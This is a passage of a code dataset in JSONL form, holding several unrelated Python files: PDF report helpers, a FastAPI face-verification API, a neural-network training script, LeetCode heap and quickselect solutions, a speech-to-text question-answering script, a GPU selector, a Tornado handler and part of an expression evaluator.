renderPDF.draw(drawing=lpr_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n # 画均值贷款利率\n # df_Lpr_ma_list = []\n # for year in year_list:\n # lpr_ma_this = ts.lpr_ma_data(year)\n # df_Lpr_ma_list.append(lpr_ma_this)\n #\n # df_Lpr_ma = pd.concat(df_Lpr_ma_list, axis=0).sort_values(by='date', ascending=True)\\\n # .drop_duplicates(subset=['1Y_5', '1Y_10', '1Y_20'], keep='first')\\\n # .apply(lambda x:x.replace('---',nan), axis=1)\n #\n # Y1_5 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_5', timeAxis='datetime')\n # Y1_10 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_10', timeAxis='datetime')\n # Y1_20 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_20', timeAxis='datetime')\n #\n # lpr_ma_drawing = genLPDrawing([tuple(Y1_5),tuple(Y1_10),tuple(Y1_20)],\n # data_note=['1年贷款基础利率-M5','1年贷款基础利率-M10','1年贷款基础利率-M20'],\n # timeAxis='day',\n # height=letter[1] * 0.3)\n #\n # renderPDF.draw(drawing=lpr_ma_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n\n c.showPage()\n return c\n\n\ndef addTailPage(canvas_param, pagesize=letter):\n \"\"\"\n 函数功能:为pdf文档添加功能,分“主题”、“副标题”两部分\n :param canvas:\n :param pagesize: 页面大小,默认A4\n :param theme: 主题字符串\n :param subtitle: 副标题字符串\n :return:\n \"\"\"\n PAGE_WIDTH = pagesize[0]\n PAGE_HEIGHT = pagesize[1]\n\n # 设置主标题字体并打印主标题\n canvas_param.setFont(\"song\", 30)\n canvas_param.drawString(20, PAGE_HEIGHT*0.7, '加群:StockReport 825832838')\n\n canvas_param.drawString(20, PAGE_HEIGHT * 0.65, '每日免费获取该文档!')\n\n canvas_param.showPage()\n\n return canvas_param","repo_name":"dxcv/My_Quant","sub_path":"Auto_Report/ReportLab/SubFunction.py","file_name":"SubFunction.py","file_ext":"py","file_size_in_byte":32173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18861051015","text":"\n\nfrom fastapi import (\n APIRouter,\n UploadFile,\n HTTPException,\n File\n)\nimport socketio\nfrom service.verification import Verification\nfrom datetime import datetime\nfrom domain.model.payload import VerifySessionPayload\n\nverification_api = APIRouter(\n prefix=\"/verification\"\n)\nVerification = Verification()\n\nsio = socketio.AsyncServer(async_mode=\"asgi\")\nsocket_app = socketio.ASGIApp(sio)\n\n@sio.event\ndef connect(sid, environ, auth):\n print('connect ', sid)\n\n@verification_api.get(\"/generate\")\nasync def generate_session():\n \"\"\"\n Generate Session Token.\n\n This will generate TTL token and store on \n\n in-memory database:\n\n * Generate Token.\n * Store Token into redis.\n \"\"\"\n\n session_token = Verification.gennerate_session_code()\n\n return {\n \"issure_at\": datetime.now(),\n \"session_token\": session_token,\n \"expire_at\": int(datetime.timestamp(datetime.utcnow()) * 1000)\n }\n\n\n@verification_api.post(\"/verify-session\")\nasync def verify_session(data: VerifySessionPayload):\n \"\"\"\n Verify Session Token.\n\n This will verify token is existed\n \n in-memory database:\n\n * Verify Token.\n \"\"\"\n token = data.session_token\n session = Verification.verify_session_code(session_code=token)\n \n if not session:\n return {\n \"status\": \"Invalid or Expired token\",\n }\n else:\n return {\n \"status\": \"Verified\",\n }\n sio.emit(f'{token}',\"Verify complete\")\n\n\n@verification_api.post(\"/verify-exist\")\nasync def verify_exist(\n file: UploadFile=File(...),\n):\n \"\"\"\n Verify is exist Face Data in DB.\n\n in-memory database:\n\n * Receive face image convert to embedding vector.\n * Check is exist face data in DB.\n \"\"\"\n \n if not file :\n raise HTTPException(status_code=400, detail=\"No file submit\")\n else:\n query = await file.read()\n res = Verification.face_recognition(query_face=query)\n return res\n \n\n\n@verification_api.post(\"/register-face\")\nasync def register_face(\n file: UploadFile=File(...),\n):\n \"\"\"\n Verify is exist Face Data in DB.\n\n in-memory database:\n\n * Receive face image convert to embedding vector.\n * Check is exist face data in DB.\n \"\"\"\n \n if not file :\n raise HTTPException(status_code=400, detail=\"No file submit\")\n else:\n query = await file.read()\n try:\n Verification.register_face(query)\n return {\n \"message\":\"face registed\"\n }\n except:\n raise HTTPException(status_code=503, detail=\"Error Register\")\n","repo_name":"pattanunNP/KlarityBackend","sub_path":"controller/verification_controller.py","file_name":"verification_controller.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70447131241","text":"import sys\nimport os\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n\nimport time\n\nimport data_loader\nfrom network import FullyConnectedFeedforwardNetwork\nfrom network import SimpleFeedforwardNetwork\nimport numpy as np\nimport pickle\n\n\ndef compare_result(predicted, expected):\n predicted_idx = np.argmax(predicted)\n expected_idx = np.argmax(expected)\n #print(\"validating testcase: expected %d, got %d\" % (expected_idx, predicted_idx))\n return predicted_idx == expected_idx\n\ndef validate_network(network, validation_data, max_data_count=None):\n \"\"\"\n max_data_count\n return the failure rate\n \"\"\"\n failure_count = 0\n total_count = 0\n for (vi, vo) in validation_data:\n total_count += 1\n predicted_output = network.GetOutput(vi)\n if (not compare_result(predicted_output, vo)):\n failure_count += 1\n if ((max_data_count is not None) and (total_count > max_data_count)):\n break\n\n result = failure_count / total_count\n return result\n\n\n\nif (__name__ == \"__main__\"):\n layer_sizes = [28*28, 30, 10]\n rho = 0.5 \n batch_size = 10\n max_epoch = 10\n\n use_simple_network = False\n if (len(sys.argv) > 2):\n raise RuntimeError(\"Do not know how to handle the command-line arguments:\\n{}\".format(sys.argv))\n elif (len(sys.argv) > 1):\n use_simple_network = (sys.argv[1] == \"simple\")\n\n if (use_simple_network):\n print(\"testing simple feedforward network\")\n n = SimpleFeedforwardNetwork(layer_sizes)\n else:\n print(\"testing fully connected feedforward network\")\n n = FullyConnectedFeedforwardNetwork(layer_sizes, \"sigmoid\")\n\n # load dataset\n training_data, validation_data, test_data = \\\n data_loader.load_mnist_dataset()\n\n # training\n for iter in range(max_epoch):\n start_time = time.time()\n actual_rho = rho / (iter + 1)\n np.random.shuffle(training_data)\n for k in range(batch_size, len(training_data), batch_size):\n #if (k > 10000):\n # break\n batch = training_data[k-batch_size:k]\n n.Train(batch, rho)\n # run validation data\n error_rate = validate_network(n, validation_data, 100)\n end_time = time.time()\n print(\"epoch %d: %.2fs, error rate %.2f%%\" % (iter, end_time - start_time, 100 * error_rate))\n pickle.dump(n, open(\"network.pkl\", \"wb\"))\n\n","repo_name":"lonelycorn/machine-learning","sub_path":"legacy/test/test_feedforward_network.py","file_name":"test_feedforward_network.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9466685928","text":"\n\"\"\"\n1985. Find the Kth Largest Integer in the Array\n\nYou are given an array of strings nums and an integer k. Each string in nums represents \nan integer without leading zeros.\n\nReturn the string that represents the kth largest integer in nums.\n\nNote: Duplicate numbers should be counted distinctly. For example, if nums is [\"1\",\"2\",\"2\"], \n\"2\" is the first largest integer, \"2\" is the second-largest integer, and \"1\" is the third-largest integer.\nExample 1:\n\nInput: nums = [\"3\",\"6\",\"7\",\"10\"], k = 4\nOutput: \"3\"\nExplanation:\nThe numbers in nums sorted in non-decreasing order are [\"3\",\"6\",\"7\",\"10\"].\nThe 4th largest integer in nums is \"3\".\nExample 2:\n\nInput: nums = [\"2\",\"21\",\"12\",\"1\"], k = 3\nOutput: \"2\"\nExplanation:\nThe numbers in nums sorted in non-decreasing order are [\"1\",\"2\",\"12\",\"21\"].\nThe 3rd largest integer in nums is \"2\".\n\"\"\"\n\n# Approach 1: Sorting\n# Time complexity: O(nlogn)\n# Space complexity: O(1)\ndef kthLargestNumber(self, nums, k):\n for i, num in enumerate(nums):\n nums[i] = int(num)\n nums.sort(reverse = True)\n return str(nums[k-1])\n\n# Approach 2: Using a maxheap\n# Time complexity: O(klogn)\n# Space complexity: O(n)\nimport heapq\ndef findKthLargest(self, nums, k):\n heap = []\n\n for i in range(len(nums)):\n heap.append(-1*int(nums[i]))\n heapq.heapify(heap)\n while k > 0:\n K_largest = -1*(heapq.heappop(heap))\n k -= 1\n return str(K_largest)\n\n# Approach 3: Using Quick select\n# Time complexity: O(n) in the best case, worst case is O(n^2)\n# Space complexity: O(1)\nclass Solution(object):\n def findKthLargest(self, nums, k):\n return self.qs(nums, 0, len(nums)-1, k)\n \n def qs(self, arr, l, r, k):\n p = self.partition(arr, l, r)\n if (k-1) == p:\n return arr[p]\n elif (k-1) > p:\n return self.qs(arr, p + 1, r, k)\n else:\n return self.qs(arr, l, p - 1, k)\n\n def partition(self, arr, l, r):\n pivot = arr[r]\n i = l\n for j in range(l, r):\n if int(arr[j]) > int(pivot):\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n arr[i], arr[r] = arr[r], arr[i]\n return i\n\n","repo_name":"yonahgraphics/Grokking-Leetcode-Patterns","sub_path":"heaps/Find the Kth Largest Integer in the Array.py","file_name":"Find the Kth Largest Integer in the Array.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"73569290599","text":"#from nltk import RegexpParser\r\n#from nltk import tokenize\r\n#from nltk.tree import *\r\n#from tempfile import TemporaryFile\r\nimport nltk\r\n#import os\r\nimport csv\r\nimport pandas as pd\r\n#import itertools\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.corpus import stopwords\r\n#from nltk.tokenize import word_tokenize\r\n#from nltk import word_tokenize, pos_tag, ne_chunk\r\n#import numpy as np\r\n#import math\r\n\r\n#Python 2.x program for Speech Recognition\r\n \r\nimport speech_recognition as sr\r\n \r\n#enter the name of usb microphone that you found\r\n#using lsusb\r\n#the following name is only used as an example\r\nmic_name = \"Microphone (High Definition Aud\"\r\n#Sample rate is how often values are recorded\r\nsample_rate = 48000\r\n#Chunk is like a buffer. It stores 2048 samples (bytes of data)\r\n#here. \r\n#it is advisable to use powers of 2 such as 1024 or 2048\r\nchunk_size = 2048\r\n#Initialize the recognizer\r\nr = sr.Recognizer()\r\n \r\n#generate a list of all audio cards/microphones\r\nmic_list = sr.Microphone.list_microphone_names()\r\n \r\n#the following loop aims to set the device ID of the mic that\r\n#we specifically want to use to avoid ambiguity.\r\nfor i, microphone_name in enumerate(mic_list):\r\n if microphone_name ==mic_list[2]:\r\n device_id = 2\r\n \r\n#use the microphone as source for input. Here, we also specify \r\n#which device ID to specifically look for incase the microphone \r\n#is not working, an error will pop up saying \"device_id undefined\"\r\nwith sr.Microphone(device_index = device_id, sample_rate = sample_rate,chunk_size = chunk_size) as source:\r\n #wait for a second to let the recognizer adjust the \r\n #energy threshold based on the surrounding noise level\r\n r.adjust_for_ambient_noise(source)\r\n print (\"Say Something\")\r\n #listens for the user's input\r\n audio = r.listen(source)\r\n \r\n try:\r\n text = r.recognize_google(audio)\r\n print (\"you said:\" + text)\r\n \r\n #error occurs when google could not understand what was said\r\n \r\n except sr.UnknownValueError:\r\n print(\"Google Speech Recognition could not understand audio\")\r\n \r\n except sr.RequestError as e:\r\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\r\n\r\n\r\n\r\n\r\ndef one():\r\n \r\n stop_words = set(stopwords.words('english'))\r\n sent_text = nltk.sent_tokenize(text)\r\n file = open('Text_Without_Stopwords.txt','w') \r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n filtered_sentence = [w for w in tokenized_text if not w in stop_words]\r\n filtered_sentence = []\r\n temp=\"\"\r\n \r\n for w in tokenized_text:\r\n if w not in stop_words:\r\n filtered_sentence.append(w)\r\n temp = temp + w +\" \"\r\n\r\n #print(temp)\r\n file.write(temp)\r\n file.close()\r\n \r\n \r\n \r\ndef two():\r\n file = open('Text_Without_Stopwords.txt','r') \r\n text = file.read()\r\n file.close()\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n stop_words = set(stopwords.words('english'))\r\n sent_text = nltk.sent_tokenize(text)\r\n file = open('Text_Lemmatized.txt','w') \r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n filtered_sentence = [w for w in tokenized_text if not w in stop_words]\r\n #filtered_sentence = []\r\n temp=\"\"\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n for w in tokenized_text:\r\n #filtered_sentence.append(w)\r\n temp = temp + lemmatizer.lemmatize(w) +\" \"\r\n file.write(temp)\r\n file.close()\r\n \r\n\r\ndef three():\r\n file = open('Text_Lemmatized.txt','r') \r\n text = file.read()\r\n file.close()\r\n word_list = text.split()\r\n word_list = [word.replace(\".\", \"\") for word in word_list]\r\n word_list = [word.replace(\",\", \"\") for word in word_list]\r\n file = open ('Text_Unique_Words.txt', 'w')\r\n #print(word_list)\r\n unique_words = set(word_list)\r\n #print(unique_words)\r\n for word in unique_words:\r\n file.write(str(word)+\" \")\r\n file.close()\r\n \r\n \r\ndef four():\r\n file = open('Text_Unique_Words.txt','r') \r\n text = file.read()\r\n file.close()\r\n wordlist = text.split()\r\n file = open('Text_to_Vector.txt','w') \r\n \r\n file1 = open('Text_Lemmatized.txt','r') \r\n text = file1.read()\r\n file1.close()\r\n sent_text = nltk.sent_tokenize(text)\r\n file.write(str(wordlist) + '\\n')\r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n wordfreq = []\r\n for w in wordlist:\r\n wordfreq.append(sentence.count(w))\r\n\r\n file.write(str(wordfreq) + '\\n')\r\n file.close()\r\n\r\n # Read in the file\r\n with open('Text_to_Vector.txt', 'r') as file :\r\n filedata = file.read()\r\n file.close()\r\n \r\n # Replace the target string\r\n filedata = filedata.replace('[', '')\r\n filedata = filedata.replace(']', '')\r\n \r\n # Write the file out again\r\n with open('Text_to_Vector.txt', 'w') as file:\r\n file.write(filedata)\r\n file.close()\r\n\r\n\r\ndef five():\r\n with open('Text_to_Vector.txt', 'r') as in_file:\r\n stripped = (line.strip() for line in in_file)\r\n\r\n lines = (line.split(\",\") for line in stripped if line)\r\n with open('WordVectortest.csv', 'w') as out_file:\r\n writer = csv.writer(out_file)\r\n #writer.writerow(('title', 'intro'))\r\n writer.writerows(lines)\r\n \r\none()\r\ntwo()\r\nthree()\r\nfour()\r\nfive()\r\n \r\n\r\ntestset = pd.read_csv('WordVectortest.csv')\r\ntestsetval = list(testset)\r\n#print(testsetval)\r\n\r\nfor i in range(len(testsetval)):\r\n testsetval[i] = testsetval[i].lower()\r\n if ' ' in testsetval[i]:\r\n testsetval[i] = testsetval[i].replace(' ','')\r\n \r\n\r\n\r\ndataset = pd.read_csv('WordVector.csv')\r\ndatasetval = list(dataset)\r\n#print(datasetval)\r\n\r\n\r\nfor i in range(len(datasetval)):\r\n datasetval[i] = datasetval[i].lower()\r\n if ' ' in datasetval[i]:\r\n datasetval[i] = datasetval[i].replace(' ','')\r\n \r\n \r\n \r\n \r\n\r\ncount = []\r\nfor k in range(len(dataset)):\r\n myset = dataset.iloc[k]\r\n c = 0\r\n for i in range(len(testsetval)):\r\n if myset[datasetval.index(testsetval[i])]==1:\r\n c = c + 1\r\n count.append(c)\r\n \r\n\r\n#print(count.index(max(count)))\r\n\r\n\r\nmyfile = open('passage.txt','r')\r\n\r\ndata = myfile.read()\r\n\r\nmydata = data.split('.')\r\nans=mydata[count.index(max(count))]\r\n\r\nmyfile.close()\r\nprint(ans)\r\nfrom gtts import gTTS\r\ntts = gTTS(text=ans, lang='en')\r\ntts.save('ans2.mp3')\r\nimport pygame\r\npygame.init()\r\npygame.mixer.music.load(\"ans2.mp3\")\r\npygame.mixer.music.play()\r\n'''from playsound import playsound\r\nplaysound('ans2.mp3')'''","repo_name":"bhanu-prakash3/Question-Answering-System","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"828436883","text":"#descripcion: programa donde se le pregunte al usuario por un numero e imprima los divisores de ese numero\n#entrada: preguntar al usuario por un numero \n#salida: numero divisores de el numero dado por el usuario\n#autor: mvillalobos\n#fecha :12/07/2017\n#version:2.0\n#plataforma: python v2.7\n\nx = int(input(\"ingrese numero:\"))\nfor i in range(1,x + 1):\n if x%i==0:\n print(i)\n","repo_name":"mvillalobos712/ejercicios_python","sub_path":"ejercicios_python5.1.py","file_name":"ejercicios_python5.1.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19702006885","text":"from matplotlib import *\nfrom numpy import *\nfrom scipy import *\nfrom pandas import *\n\nmainMenuPrint: str = \"Main Menu: \\n[1] New Data \\n[2] Open Data \\n[3] Save Data \\n[4] View Data \\n[5] Edit Data \\n[6]\" \\\n \" Show Save File Path \\n[7] Check Concordant Results \\n[8] Average Data\\n[9] Plot Graph\"\nfirstStart: bool = True\nanyData: bool = False\ndataSaved: bool = False\nyesNo = ''\nseeData = ''\nDataFile: str = ''\n\ndef firstTime():\n global firstStart\n while firstStart == True:\n print('Welcome to SciLabs, this is an interface to help with data analysis for sciences \\nPlease remmeber to enter the value shown in the [], but without the surrounding []')\n firstStart = False\n\ndef saveYesNo():\n global yesNo\n while yesNo not in ('Y', 'N'):\n yesNo = input('Do you want to save: \\n[Y]es \\n[N]o:\\n')\n if yesNo == 'Y':\n saveData()\n break\n elif yesNo == 'N':\n pass\n break\n else:\n errorOut(1)\n\ndef openData():\n global seeData\n global dataSaved\n global path\n global DataFile\n if dataSaved == False:\n print('Current Data is not saved')\n saveYesNo()\n else:\n pass\n path = str(input('Enter file path \\nShould be a .txt file in current directory where this program is running from:\\n'))\n DataFile = open(path, 'r+')\n\n while seeData not in ('Y', 'N'):\n seeData = str(input('Do you want to see your data: \\n[Y]es \\n[N]o: \\n'))\n if seeData == 'Y':\n viewData()\n elif seeData == 'N':\n pass\n else:\n errorOut(1)\n\n\ndef errorOut(state):\n print('There has been an error:')\n if state == 1:\n print('Input not recognised, please try again\\n')\n elif state == 2:\n print('No data present, please create data\\n')\n else:\n print('Big problem: Error not known!\\n')\n\n\ndef mainMenu():\n firstTime()\n\n print(mainMenuPrint)\n menuInput: int = int(input('Enter option:'))\n\n if menuInput == 2:\n openData()\n elif menuInput == 3:\n saveData()\n elif menuInput == 4:\n viewData()\n elif menuInput == 5:\n editData()\n elif menuInput == 6:\n fileLoc()\n elif menuInput == 7:\n checkConcord()\n elif menuInput == 8:\n averageData()\n elif menuInput == 9:\n plotGraph()\n elif menuInput == 1:\n newData()\n else:\n errorOut(1)\n\n\nwhile True:\n mainMenu()\n","repo_name":"thomasholland123/SDAK","sub_path":"sdak.py","file_name":"sdak.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74893744998","text":"from django.conf.urls import url\nfrom kompany import views\n\nurlpatterns = [\n url(r'^$', views.home_page, name='home'),\n url(r'^search/$', views.search, name='search'),\n url(r'^product/(?P[-\\w]+)/$', views.product_page, name='product_page'),\n url(r'^(?P[a-z]+)/(?P[-\\w]+)/$', views.category_view, name='product_list'),\n url(r'^(?P[-\\w]+)/$', views.category_view, name='product_list'),\n]\n","repo_name":"iamvinitk/Online-Retail","sub_path":"kompany/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"} +{"seq_id":"5554043440","text":"import os\nimport random\nimport string\nfrom enum import Enum\n\nfrom fastapi import APIRouter, UploadFile, File, Depends\nfrom pdfminer.pdfparser import PDFSyntaxError\nfrom starlette.responses import JSONResponse\n\nfrom app.db.crud import CrudDatabase\nfrom app.utils.pdfparser import shop_parse_pdf, user_parse_pdf\nfrom app.utils.pdfsaver import chunked_copy, generate_path_file\n\nfile_router = APIRouter()\n\n\nclass ParseEnum(str, Enum):\n SHOP = \"shop\"\n USER = \"user\"\n\n\n@file_router.post(\"/upload/document\")\nasync def parse_pdf(document_type: ParseEnum, file: UploadFile = File(...)):\n exception = JSONResponse(\n status_code=400,\n content={\n \"content\": \"An error occurred while trying to disband the document,\"\n \" please try again later.\"\n }\n )\n\n if document_type == ParseEnum.SHOP:\n try:\n result = shop_parse_pdf(path=file.file)\n return result\n except ValueError:\n return exception\n\n if document_type == ParseEnum.USER:\n try:\n result = user_parse_pdf(path=file.file)\n return result\n except ValueError:\n return exception\n\n\n","repo_name":"SilentSt/AnoFoodsharingREST","sub_path":"app/routes/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4788275670","text":"\nimport tkinter as tk\n\nframe = tk.Tk()\nframe.title(\"Text counter\")\nframe.geometry('400x200')\n\n \ndef printInput():\n inp = inputtxt.get(1.0, \"end-1c\")\n lbl.config(text = \"Words \"+str(len(inp.split())))\n\ndef letterInput():\n inp = inputtxt.get(1.0, \"end-1c\")\n lbl.config(text = \"Characters \"+str(len(inp)))\n \n\ninputtxt = tk.Text(frame, height = 5, width = 20)\n \ninputtxt.pack()\n \n\nprintButton = tk.Button(frame,text = \"Check how many words are there:\", command = printInput)\nprintButton.pack()\nletterButton = tk.Button(frame,text =\"check how many letters are there:\",command = letterInput)\nletterButton.pack()\n\nlbl = tk.Label(frame, text = \"\")\nlbl.pack()\nframe.mainloop()\n","repo_name":"DhruvaNaik/words-and-letter-counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15528695253","text":"from subprocess import Popen, PIPE\nimport torch\n\ndef get_first_free_gpu():\n if torch.cuda.is_available():\n gpu_output = Popen([\"nvidia-smi\", \"-q\", \"-d\", \"PIDS\"], stdout=PIPE, encoding=\"utf-8\")\n gpu_processes = Popen([\"grep\", \"Processes\"], stdin=gpu_output.stdout, stdout=PIPE, encoding=\"utf-8\")\n gpu_output.stdout.close()\n processes_output = gpu_processes.communicate()[0]\n for i, line in enumerate(processes_output.strip().split(\"\\n\")):\n if line.endswith(\"None\"):\n print(f\"Found Free GPU ID: {i}\")\n cuda_device = f\"cuda:{i}\"\n torch.cuda.set_device(cuda_device)\n return torch.device(cuda_device)\n print(\"WARN - No Free GPU found! Running on CPU instead...\")\n return torch.device(\"cpu\")\n","repo_name":"technion-nlp-lab/utils","sub_path":"get_first_free_gpu.py","file_name":"get_first_free_gpu.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75087281641","text":"from tornado import web, ioloop, httpserver\nfrom handlers import BaseHandler\nfrom models import user_mod, log_mod\nfrom lib import alg_list\nimport tornado\n\n\nclass AlgShowHandler(BaseHandler.BaseHandler):\n @tornado.web.authenticated\n def get(self):\n username = tornado.escape.json_decode(self.current_user)\n usermod = user_mod.UserModel()\n userinfo = usermod.find_user(username)\n curid = self.get_argument('algid')\n\n strh = str(userinfo['haveseen'])\n print(strh)\n if strh == 'None':\n strh = curid\n else:\n haveseen = userinfo['haveseen'].split(' ')\n if curid not in haveseen:\n strh += ' ' + curid\n\n usermod.update_user_haveseen(userinfo['id'], strh)\n usermod.update_user_lastseen(userinfo['id'], curid)\n self.render(\n 'algorithm.html',\n alg_list=alg_list.alg,\n username=username,\n curid=curid,\n )\n","repo_name":"acptek/VisualPanel","sub_path":"handlers/AlgorithmShow.py","file_name":"AlgorithmShow.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33578535977","text":"from __future__ import print_function\nimport sys\nimport os\nimport re\nimport inspect\nimport six\nfrom AssimCtypes import ADDR_FAMILY_IPV4, ADDR_FAMILY_IPV6\nfrom AssimCclasses import pyNetAddr, pyConfigContext\n\n#\n#\nclass GraphNodeExpression(object):\n \"\"\"We implement Graph node expressions - we are't a real class\"\"\"\n\n functions = {}\n\n def __init__(self):\n raise NotImplementedError(\"This is not a real class\")\n\n @staticmethod\n def evaluate(expression, context):\n \"\"\"\n Evaluate an expression.\n It can be:\n None - return None\n 'some-value -- return some-value (it's a constant)\n or an expression to find in values or graphnodes\n or @functionname(args) - for defined functions...\n\n We may add other kinds of expressions in the future...\n \"\"\"\n if not isinstance(expression, six.string_types):\n # print('RETURNING NONSTRING:', expression, file=sys.stderr)\n return expression\n expression = str(expression.strip())\n if not hasattr(context, \"get\") or not hasattr(context, \"__setitem__\"):\n context = ExpressionContext(context)\n # print('''EVALUATE('%s') (%s):''' % (expression, type(expression))\n # The value of this parameter is a constant...\n if expression.startswith('\"'):\n if expression[-1] != '\"':\n print(\"unquoted constant string '%s'\" % expression, file=sys.stderr)\n # print('''Constant string: \"%s\"''' % (expression[1:-1]), file=sys.stderr)\n return expression[1:-1] if expression[-1] == '\"' else None\n if (expression.startswith(\"0x\") or expression.startswith(\"0X\")) and len(expression) > 3:\n return int(expression[2:], 16)\n if expression.isdigit():\n return int(expression, 8) if expression.startswith(\"0\") else int(expression)\n if expression.find(\"(\") >= 0:\n value = GraphNodeExpression.functioncall(expression, context)\n context[expression] = value\n return value\n # if expression.startswith('$'):\n # print('RETURNING VALUE OF %s' % expression[1:], file=sys.stderr)\n # print('Context is %s' % str(context), file=sys.stderr)\n # print('RETURNING VALUE OF %s = %s'\\, file=sys.stderr)\n # % (expression, context.get(expression[1:], None))\n value = context.get(expression[1:], None) if expression.startswith(\"$\") else expression\n return value\n\n # pylint R0912: too many branches - really ought to write a lexical analyzer and parser\n # On the whole it would be simpler and easier to understand...\n # pylint: disable=R0912\n @staticmethod\n def _compute_function_args(arglist, context):\n \"\"\"Compute the arguments to a function call. May contain function calls\n and other GraphNodeExpression, or quoted strings...\n Ugly lexical analysis.\n Really ought to write a real recursive descent parser...\n \"\"\"\n # print('_compute_function_args(%s)' % str(arglist), file=sys.stderr)\n args = []\n argstrings = []\n nestcount = 0\n arg = \"\"\n instring = False\n prevwasquoted = False\n for char in arglist:\n if instring:\n if char == '\"':\n instring = False\n prevwasquoted = True\n else:\n arg += char\n elif nestcount == 0 and char == '\"':\n instring = True\n elif nestcount == 0 and char == \",\":\n if prevwasquoted:\n prevwasquoted = False\n args.append(arg)\n argstrings.append(arg)\n else:\n arg = arg.strip()\n if arg == \"\":\n continue\n # print(\"EVALUATING [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.evaluate(arg, context))\n argstrings.append(arg)\n arg = \"\"\n elif char == \"(\":\n nestcount += 1\n # print(\"++nesting: %d\" % (nestcount), file=sys.stderr)\n arg += char\n elif char == \")\":\n arg += char\n nestcount -= 1\n # print(\"--nesting: %d\" % (nestcount), file=sys.stderr)\n if nestcount < 0:\n return (None, None)\n if nestcount == 0:\n if prevwasquoted:\n # print('_compute_function_args: QUOTED argument: \"%s\"' % arg, file=sys.stderr)\n args.append(arg)\n else:\n arg = arg.strip()\n # print(\"GnE.functioncall [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.functioncall(arg, context))\n argstrings.append(arg)\n arg = \"\"\n else:\n arg += char\n if nestcount > 0 or instring:\n # print(\"Nestcount: %d, instring: %s\" % (nestcount, instring), file=sys.stderr)\n return (None, None)\n if arg != \"\":\n if prevwasquoted:\n # print('_compute_function_args: quoted argument: \"%s\"' % arg, file=sys.stderr)\n args.append(arg)\n else:\n # print(\"GnE.evaluate [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.evaluate(arg, context))\n argstrings.append(arg)\n # print('RETURNING [%s] [%s]' % (args, argstrings), file=sys.stderr)\n return (args, argstrings)\n\n @staticmethod\n def functioncall(expression, context):\n \"\"\"Performs a function call for our expression language\n\n Figures out the function name, and the arguments and then\n calls that function with those arguments.\n\n All our defined functions take an argv argument string first, then an\n ExpressionContext argument.\n\n This parsing is incredibly primitive. Feel free to improve it ;-)\n\n \"\"\"\n expression = expression.strip()\n if expression[-1] != \")\":\n print(\"%s does not end in )\" % expression, file=sys.stderr)\n return None\n expression = expression[: len(expression) - 1]\n (funname, arglist) = expression.split(\"(\", 1)\n # print('FUNCTIONCALL: %s(%s)' % (funname, arglist), file=sys.stderr)\n funname = funname.strip()\n arglist = arglist.strip()\n #\n # At this point we have all our arguments as a string , but it might contain\n # other (nested) calls for us to evaluate\n #\n # print('FunctionCall: arglist: [%s]' % (arglist), file=sys.stderr)\n args, _argstrings = GraphNodeExpression._compute_function_args(arglist, context)\n # print('args: %s' % (args), file=sys.stderr)\n # print('_argstrings: %s' % (_argstrings), file=sys.stderr)\n if args is None:\n return None\n\n if funname.startswith(\"@\"):\n funname = funname[1:]\n if funname not in GraphNodeExpression.functions:\n print(\"BAD FUNCTION NAME: %s\" % funname, file=sys.stderr)\n return None\n # print('ARGSTRINGS %s(%s)' % (funname, str(_argstrings)), file=sys.stderr)\n # print('ARGS: %s' % (str(args)), file=sys.stderr)\n ret = GraphNodeExpression.functions[funname](args, context)\n # print('%s(%s) => %s' % (funname, args, ret), file=sys.stderr)\n return ret\n\n @staticmethod\n def FunctionDescriptions():\n \"\"\"Return a list of tuples of (funcname, docstring) for all our GraphNodeExpression\n defined functions. The list is sorted by function name.\n \"\"\"\n names = sorted(GraphNodeExpression.functions.keys())\n ret = []\n for name in names:\n ret.append((name, 